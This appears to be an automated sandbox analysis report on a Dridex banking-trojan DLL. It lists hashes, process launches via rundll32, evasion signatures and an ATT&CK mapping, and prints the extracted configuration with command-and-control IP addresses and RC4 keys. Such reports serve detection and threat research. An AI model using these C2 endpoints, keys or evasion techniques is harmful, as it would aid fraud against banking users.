Play interactive tour

Edit tour

Analysis Report BJKPKLUPiD.dll

Overview

General Information

Sample Name:	BJKPKLUPiD.dll
Analysis ID:	392883
MD5:	ffc39c266b67da9e1847106d0adc566b
SHA1:	37f852cd92c6191ae6b34ffb6ce69646b09b2900
SHA256:	b3bc5083836846848f682dc1a2ab091ac3c5256d6924952232c524287911d6fd
Tags:	40111Dridex
Infos:
Most interesting Screenshot:

Detection

Dridex Dropper

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Dridex dropper found

Found malware configuration

Yara detected Dridex unpacked file

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Tries to delay execution (extensive OutputDebugStringW loop)

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Abnormal high CPU Usage

Antivirus or Machine Learning detection for unpacked file

Contains functionality to call native functions

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to query locales information (e.g. system language)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

One or more processes crash

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 6528 cmdline: loaddll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 6560 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6608 cmdline: rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6748 cmdline: rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',ReadLogRecord MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 3548 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6528 -s 148 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 40111, "C2 list": ["94.247.168.64:443", "159.203.93.122:8172", "50.116.27.97:2303"], "RC4 keys": ["VOw9c7u110XYjoFF2SzRWNcWNob7Sec1HxEVgBrFF", "5gZeCc8o5cQELWnF44Ik184W6MoZ25O98Rol7kPT2itFWvdxWiT70K4o4YnFUN4mL"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000005.00000002.728718792.0000000070981000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.rundll32.exe.70980000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
4.2.rundll32.exe.70980000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 4.2.rundll32.exe.70980000.3.unpack

Malware Configuration Extractor: Dridex {"Version": 40111, "C2 list": ["94.247.168.64:443", "159.203.93.122:8172", "50.116.27.97:2303"], "RC4 keys": ["VOw9c7u110XYjoFF2SzRWNcWNob7Sec1HxEVgBrFF", "5gZeCc8o5cQELWnF44Ik184W6MoZ25O98Rol7kPT2itFWvdxWiT70K4o4YnFUN4mL"]}

Machine Learning detection for sample

Show sources

Source: BJKPKLUPiD.dll

Joe Sandbox ML: detected

Source: 1.2.loaddll32.exe.8f0000.1.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 5.2.rundll32.exe.3390000.2.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 4.2.rundll32.exe.2cc0000.1.unpack	Avira: Label: TR/ATRAPS.Gen2

Source: BJKPKLUPiD.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: BJKPKLUPiD.dll

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: opengl32.pdb source: WerFault.exe, 0000000E.00000003.669611843.0000000004E07000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000E.00000003.669606203.0000000004E02000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: wgdi32full.pdbk source: WerFault.exe, 0000000E.00000003.669606203.0000000004E02000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000E.00000003.669611843.0000000004E07000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000004.00000003.398421217.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.475061167.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: glu32.pdb source: WerFault.exe, 0000000E.00000003.669611843.0000000004E07000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000004.00000003.398421217.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.475061167.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb\| source: WerFault.exe, 0000000E.00000003.669611843.0000000004E07000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000E.00000003.669611843.0000000004E07000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: fffp4.pdb source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp, BJKPKLUPiD.dll
Source:	Binary string: wimm32.pdbn source: WerFault.exe, 0000000E.00000003.669611843.0000000004E07000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000E.00000003.669628863.0000000004E00000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000E.00000003.662739422.0000000002CF8000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000000E.00000003.669611843.0000000004E07000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000E.00000003.669628863.0000000004E00000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000E.00000003.669628863.0000000004E00000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: a/pjr2pCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000E.00000002.675254506.0000000000892000.00000004.00000010.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 94.247.168.64:443
Source: Malware configuration extractor	IPs: 159.203.93.122:8172
Source: Malware configuration extractor	IPs: 50.116.27.97:2303

Source: Joe Sandbox View	IP Address: 159.203.93.122 159.203.93.122
Source: Joe Sandbox View	IP Address: 50.116.27.97 50.116.27.97
Source: Joe Sandbox View	IP Address: 94.247.168.64 94.247.168.64

Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
Source: Joe Sandbox View	ASN Name: GLESYS-ASSE GLESYS-ASSE

Source: BJKPKLUPiD.dll

String found in binary or memory: http://ansicon.adoxa.vze.com/6

Source: loaddll32.exe, 00000001.00000002.677687815.000000000099B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Dridex dropper found

Show sources

Source: Initial file

Signature Results: Dridex dropper behavior

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.728718792.0000000070981000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.rundll32.exe.70980000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.70980000.3.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7099218C NtDelayExecution,	4_2_7099218C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_70992790 NtAllocateVirtualMemory,	4_2_70992790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7098BC00 NtClose,	4_2_7098BC00

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_70981494	4_2_70981494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_709907CC	4_2_709907CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_709914D8	4_2_709914D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_709884E4	4_2_709884E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7098A5A4	4_2_7098A5A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_70989144	4_2_70989144
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_709992DC	4_2_709992DC

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6528 -s 148

Source: BJKPKLUPiD.dll

Binary or memory string: OriginalFilenameANSI32.dll0 vs BJKPKLUPiD.dll

Source: BJKPKLUPiD.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: BJKPKLUPiD.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal80.bank.troj.evad.winDLL@8/4@0/3

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6528

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE11.tmp

Jump to behavior

Source: BJKPKLUPiD.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',ReadLogRecord
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6528 -s 148
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',ReadLogRecord	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',#1	Jump to behavior

Source: BJKPKLUPiD.dll

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: BJKPKLUPiD.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: opengl32.pdb source: WerFault.exe, 0000000E.00000003.669611843.0000000004E07000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000E.00000003.669606203.0000000004E02000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: wgdi32full.pdbk source: WerFault.exe, 0000000E.00000003.669606203.0000000004E02000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000E.00000003.669611843.0000000004E07000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000004.00000003.398421217.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.475061167.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: glu32.pdb source: WerFault.exe, 0000000E.00000003.669611843.0000000004E07000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000004.00000003.398421217.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.475061167.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb\| source: WerFault.exe, 0000000E.00000003.669611843.0000000004E07000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000E.00000003.669611843.0000000004E07000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: fffp4.pdb source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp, BJKPKLUPiD.dll
Source:	Binary string: wimm32.pdbn source: WerFault.exe, 0000000E.00000003.669611843.0000000004E07000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000E.00000003.669628863.0000000004E00000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000E.00000003.662739422.0000000002CF8000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000000E.00000003.669611843.0000000004E07000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000E.00000003.669628863.0000000004E00000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000E.00000003.669628863.0000000004E00000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 0000000E.00000003.669594927.0000000004E31000.00000004.00000001.sdmp
Source:	Binary string: a/pjr2pCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000E.00000002.675254506.0000000000892000.00000004.00000010.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_7098F744 push esi; mov dword ptr [esp], 00000000h

4_2_7098F745

Source: initial sample

Static PE information: section name: .text entropy: 7.55877156847

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Section loaded: OutputDebugStringW count: 1684

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Show sources

Source: C:\Windows\System32\loaddll32.exe	Section loaded: \KnownDlls32\testapp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\testapp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\testapp.exe	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 964			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 720			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_709907CC GetTokenInformation,GetSystemInfo,GetTokenInformation,

4_2_709907CC

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: WerFault.exe, 0000000E.00000002.676452100.0000000004F20000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 0000000E.00000002.676452100.0000000004F20000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 0000000E.00000002.676452100.0000000004F20000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WerFault.exe, 0000000E.00000002.676452100.0000000004F20000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_70986DC8 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

4_2_70986DC8

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_70993060 RtlAddVectoredExceptionHandler,

4_2_70993060

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',#1

Jump to behavior

Source: rundll32.exe, 00000004.00000002.725490556.0000000003280000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.726388179.00000000038C0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000004.00000002.725490556.0000000003280000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.726388179.00000000038C0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000004.00000002.725490556.0000000003280000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.726388179.00000000038C0000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: rundll32.exe, 00000004.00000002.725490556.0000000003280000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.726388179.00000000038C0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

4_2_70986DC8

Source: C:\Windows\SysWOW64\rundll32.exe

4_2_70986DC8

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Virtualization/Sandbox Evasion21	Input Capture1	Security Software Discovery111	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	Virtualization/Sandbox Evasion21	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing3	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
BJKPKLUPiD.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.2.loaddll32.exe.8f0000.1.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
5.2.rundll32.exe.3390000.2.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
4.2.rundll32.exe.2cc0000.1.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ansicon.adoxa.vze.com/6	BJKPKLUPiD.dll	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
159.203.93.122	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
50.116.27.97	unknown	United States	63949	LINODE-APLinodeLLCUS	true
94.247.168.64	unknown	Sweden	43948	GLESYS-ASSE	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	392883
Start date:	19.04.2021
Start time:	23:45:12
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	BJKPKLUPiD.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.bank.troj.evad.winDLL@8/4@0/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 99.8% (good quality ratio 96.3%) Quality average: 80.5% Quality standard deviation: 25.5%
HCA Information:	Successful, ratio: 88% Number of executed functions: 21 Number of non-executed functions: 7
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, wermgr.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
